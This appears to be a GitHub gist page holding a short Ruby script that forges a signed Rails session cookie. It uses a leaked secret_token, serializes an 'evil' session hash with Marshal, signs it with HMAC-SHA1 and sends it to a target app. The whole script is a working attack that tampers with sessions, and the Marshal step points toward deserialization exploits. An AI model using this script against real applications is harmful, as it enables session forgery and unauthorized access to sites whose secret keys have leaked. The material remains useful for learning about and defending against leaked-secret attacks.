Created
July 22, 2013 08:22
-
-
Save robert/6052207 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require "net/http" | |
| require "uri" | |
| secret_token = "stolen-from-github-or-somewhere" | |
| # Construct your evil hash | |
| my_evil_session_hash = { | |
| "ive_made_a_huge_mistake" => true | |
| } | |
| # Serialize your hash | |
| marshal_dump = Marshal.dump(my_evil_session_hash) | |
| # Base64 encode this dump | |
| unescaped_cookie_value = Base64.encode64(marshal_dump) | |
| # Escape any troublesome characters and remove line breaks altogether | |
| escaped_cookie_value = CGI.escape(unescaped_cookie_value).gsub("%0A", "") | |
| # Calculate the signature using the HMAC digest of the secret_token and the escaped cookie value. Replace %3D with equals signs. | |
| cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret_token, escaped_cookie_value.gsub("%3D", "=")) | |
| # Construct your evil cookie by concatenating the value with the signature | |
| my_evil_cookie = "_MyApp_session=#{unescaped_cookie_value}--#{cookie_signature}" | |
| # BOMBS AWAY | |
| url = URI.parse("http://myapp.com/") # Make sure you have a trailing / if you are sending to the root path | |
| req = Net::HTTP::Get.new(url.path) | |
| req.add_field("Cookie", my_evil_cookie) | |
| res = Net::HTTP.new(url.host, url.port).start do |http| | |
| http.request(req) | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment